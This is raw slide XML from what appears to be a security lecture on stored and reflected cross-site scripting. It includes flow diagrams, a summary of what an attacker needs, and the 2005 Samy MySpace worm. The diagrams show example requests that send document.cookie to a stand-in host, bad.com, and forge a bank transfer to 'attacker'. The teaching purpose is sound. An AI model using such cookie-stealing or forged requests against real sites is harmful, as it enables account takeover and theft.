          <a:lstStyle/>
          <a:p>
            <a:pPr marL="635000" indent="-635000">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Stored (or “persistent”) XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Attacker leaves script on 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server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Server later unwittingly sends it to your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Browser executes it within same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bank.com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tored XSS att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Stored XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="815" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2902597" y="3845068"/>
            <a:ext cx="1365917" cy="2007902"/>
            <a:chOff x="287035" y="-55562"/>
            <a:chExt cx="1365915" cy="2007900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="813" name="Browser"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="287035" y="523587"/>
              <a:ext cx="1365916" cy="1428751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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="814" name="Client"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="373702" y="-55563"/>
              <a:ext cx="119258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Client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="816" name="bank.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8083697" y="5945783"/>
            <a:ext cx="1632104" cy="142875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  <a:hlinkClick r:id="rId4"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="bad.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8083697" y="2669589"/>
            <a:ext cx="1632104" cy="142875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bad.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="823" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8470982" y="4147548"/>
            <a:ext cx="1431607" cy="1797722"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1431606" cy="1797721"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="818" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="-1"/>
              <a:ext cx="2" cy="179772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19" name="Inject malicious script"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="171056" y="562645"/>
              <a:ext cx="1260551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2000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="06BC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Inject</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>script</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="822" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="180089" y="173555"/>
              <a:ext cx="353109" cy="444501"/>
              <a:chOff x="0" y="20637"/>
              <a:chExt cx="353108" cy="444500"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="820" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="66333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1" name="1"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="38365" y="20637"/>
                <a:ext cx="228601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830" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4259517" y="4553303"/>
            <a:ext cx="3825981" cy="1708933"/>
            <a:chOff x="0" y="22382"/>
            <a:chExt cx="3825979" cy="1708932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="824" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="242057"/>
              <a:ext cx="3825980" cy="148925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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="829" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="21528294">
              <a:off x="680027" y="46309"/>
              <a:ext cx="2307612" cy="1263612"/>
              <a:chOff x="6966" y="19178"/>
              <a:chExt cx="2307611" cy="1263610"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="825" name="Request content"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1304020">
                <a:off x="360690" y="553785"/>
                <a:ext cx="1952753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l">
                  <a:defRPr sz="2000"/>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>Request content</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="828" name="Group"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6966" y="19178"/>
                <a:ext cx="458568" cy="529556"/>
                <a:chOff x="6966" y="19178"/>
                <a:chExt cx="458566" cy="529555"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="826" name="Circle"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="59696" y="107401"/>
                  <a:ext cx="353109" cy="353109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27" name="2"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="78566" y="61705"/>
                  <a:ext cx="315369" cy="444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8100" tIns="38100" rIns="38100" bIns="38100" numCol="1" anchor="ctr">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle>
                  <a:lvl1pPr>
                    <a:defRPr sz="2400">
                      <a:solidFill>
                        <a:srgbClr val="1333FF"/>
                      </a:solidFill>
                    </a:defRPr>
                  </a:lvl1pPr>
                </a:lstStyle>
                <a:p>
                  <a:r>
                    <a:t>2</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="836" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4243673" y="5043107"/>
            <a:ext cx="3857668" cy="1769764"/>
            <a:chOff x="-73260" y="-5996"/>
            <a:chExt cx="3857666" cy="1769762"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="831" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-73261" y="255740"/>
              <a:ext cx="3857668" cy="150802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32" name="Receive malicious script"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1290205">
              <a:off x="636327" y="696192"/>
              <a:ext cx="285546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/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Receive malicious script</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="835" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="314865" y="-5997"/>
              <a:ext cx="458567" cy="529557"/>
              <a:chOff x="6966" y="19178"/>
              <a:chExt cx="458566" cy="529555"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="833" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="59696" y="107401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4" name="3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="78566" y="61705"/>
                <a:ext cx="315369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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="841" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2010688" y="5597414"/>
            <a:ext cx="1980439" cy="2074689"/>
            <a:chOff x="0" y="20637"/>
            <a:chExt cx="1980438" cy="2074688"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="837" name="Execute the malicious script as though the…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="495125"/>
              <a:ext cx="1980439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2000"/>
              </a:pPr>
              <a:r>
                <a:t>Execute the</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious script</a:t>
              </a:r>
              <a:br/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as though the</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000"/>
              </a:pPr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server meant us</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000"/>
              </a:pPr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to run it</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="840" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="22781" y="20637"/>
              <a:ext cx="353109" cy="444501"/>
              <a:chOff x="0" y="20637"/>
              <a:chExt cx="353108" cy="444500"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="838" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="66333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9" name="4"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="38365" y="20637"/>
                <a:ext cx="276378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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="847" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4279474" y="3219244"/>
            <a:ext cx="3835987" cy="1302796"/>
            <a:chOff x="0" y="67668"/>
            <a:chExt cx="3835986" cy="1302795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="842" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="0" y="197462"/>
              <a:ext cx="3835987" cy="1173002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43" name="Steal valuable data"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="615283" y="386130"/>
              <a:ext cx="226288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chemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Steal valuable data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="846" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="229540" y="691311"/>
              <a:ext cx="477570" cy="537511"/>
              <a:chOff x="8994" y="18574"/>
              <a:chExt cx="477568" cy="537510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="844" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="71224" y="110775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5" name="5"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="90094" y="65079"/>
                <a:ext cx="31537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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="853" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2299948">
            <a:off x="4274516" y="5863403"/>
            <a:ext cx="3835987" cy="1354477"/>
            <a:chOff x="0" y="15987"/>
            <a:chExt cx="3835986" cy="1354476"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="848" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="0" y="197462"/>
              <a:ext cx="3835987" cy="1173002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49" name="Perform attacker action"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="415971" y="402997"/>
              <a:ext cx="273786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chemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Perform attacker action</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="852" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="40336" y="776725"/>
              <a:ext cx="477569" cy="537511"/>
              <a:chOff x="8994" y="18574"/>
              <a:chExt cx="477568" cy="537510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="850" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="71224" y="110775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1" name="5"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="90094" y="65079"/>
                <a:ext cx="31537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sp>
        <p:nvSpPr>
          <p:cNvPr id="854" name="GET http://bank.com/transfer?amt=9999&amp;to=attacker"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4063536" y="7759226"/>
            <a:ext cx="8307773" cy="4095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GET http://bank.com/transfer?amt=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="GET http://bad.com/steal?c=document.cookie"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646453" y="2706584"/>
            <a:ext cx="7134102" cy="4095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GET http://bad.com/steal?c=document.cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8744094" y="7018497"/>
            <a:ext cx="311309" cy="284547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" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="823" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="830" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="836" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="841" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="847" grpId="9" animBg="1" advAuto="0"/>
      <p:bldP spid="853" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="854" grpId="8" animBg="1" advAuto="0"/>
      <p:bldP spid="855" grpId="10" animBg="1" advAuto="0"/>
      <p:bldP spid="856" grpId="2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tored XSS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Stored XSS Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="Target: User with Javascript-enabled browser who visits user-influenced content on a vulnerable web servi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Target</a:t>
            </a:r>
            <a:r>
              <a:t>: User with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Javascript-enabled browser</a:t>
            </a:r>
            <a:r>
              <a:t> who visits </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>user-influenced content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on a vulnerable web service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 goal</a:t>
            </a:r>
            <a:r>
              <a:t>: Run script in user’s browser with same access as provided to server’s regular scripts (i.e., subvert SOP)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Attacker needs</a:t>
            </a:r>
            <a:r>
              <a:t>: Ability to leave content on the web server (forums, comments, custom profiles) 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Optional: a server for receiving stolen user information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Key trick</a:t>
            </a:r>
            <a:r>
              <a:t>: Server fails to ensure uploaded content does not contain embedded scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860" name="Where have we heard this before?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5247576" y="8859866"/>
            <a:ext cx="75330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 have we heard this before?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" grpId="1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="860" grpId="2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Your friend and mine, Sam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7040"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Your friend and mine, Samy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Samy embedded Javascript in his MySpace page (2005)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322199" cy="6286500"/>
          </a:xfrm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3800"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>Samy embedded Javascript in his MySpace page (2005)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MySpace servers attempted to filter it, but failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="408940" indent="-408940" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="3800"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>Users who visited his page ran the program, which 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Made them friends with Samy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Displayed “but most of all, Samy is my hero” on profile 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Installed script in their profile to propagate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="408940" indent="-408940" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="3800"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>From 73 to 1,000,000 friends in 20 hours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Took down MySpace for a weekend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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4534" y="6644101"/>
            <a:ext cx="2857501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5" name="Felony computer hacking; banned from computers for 3 years"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845875" y="8995425"/>
            <a:ext cx="92473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5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Felony computer hacking; banned from computers for 3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" grpId="1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="865" grpId="2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wo types of X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types of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Stored (or “persistent”) XSS attac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8800" indent="-558800" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="3168">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Stored (or “persistent”) XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="651933" lvl="1" indent="-260773" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="2112">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Attacker leaves their script on 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server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="651933" lvl="1" indent="-260773" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="2112">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>The server later unwittingly sends it to your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="651933" lvl="1" indent="-260773" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="2112">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Your browser, none the wiser, executes it within the same origin as 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server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="558800" indent="-558800" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="3168">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Reflected XSS attack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Attacker gets you to send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a URL that includes Javascript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echoes</a:t>
            </a:r>
            <a:r>
              <a:t> the script back to you in its response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Your browser executes the script in the response within the same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bank.com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" grpId="1" build="p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Reflected XSS att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Reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="875" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3227317" y="3481515"/>
            <a:ext cx="1365917" cy="2951633"/>
            <a:chOff x="287035" y="-773022"/>
            <a:chExt cx="1365915" cy="2951631"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="873" name="Browser"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="287035" y="-220410"/>
              <a:ext cx="1365916" cy="2399019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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="874" name="Client"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="373702" y="-773023"/>
              <a:ext cx="119258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Client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="bank.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8439852" y="6855362"/>
            <a:ext cx="1632104" cy="142875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  <a:hlinkClick r:id="rId4"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="877" name="bad.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8439852" y="2788188"/>
            <a:ext cx="1632104" cy="142875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bad.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="884" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4571108" y="5306994"/>
            <a:ext cx="3870545" cy="1699347"/>
            <a:chOff x="-44563" y="31968"/>
            <a:chExt cx="3870543" cy="1699346"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="878" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-44564" y="221757"/>
              <a:ext cx="3870545" cy="150955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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="883" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="21528294">
              <a:off x="678166" y="51122"/>
              <a:ext cx="1847993" cy="1080394"/>
              <a:chOff x="6966" y="19178"/>
              <a:chExt cx="1847991" cy="1080392"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="879" name="Click on link"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1304020">
                <a:off x="378277" y="462176"/>
                <a:ext cx="1457961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l">
                  <a:defRPr sz="2000"/>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>Click on link</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="882" name="Group"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6966" y="19178"/>
                <a:ext cx="458568" cy="529556"/>
                <a:chOff x="6966" y="19178"/>
                <a:chExt cx="458566" cy="529555"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="880" name="Circle"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="59696" y="107401"/>
                  <a:ext cx="353109" cy="353109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1" name="3"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="78566" y="61705"/>
                  <a:ext cx="315369" cy="444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8100" tIns="38100" rIns="38100" bIns="38100" numCol="1" anchor="ctr">
                  <a:spAutoFit/>
                </a:bodyPr>
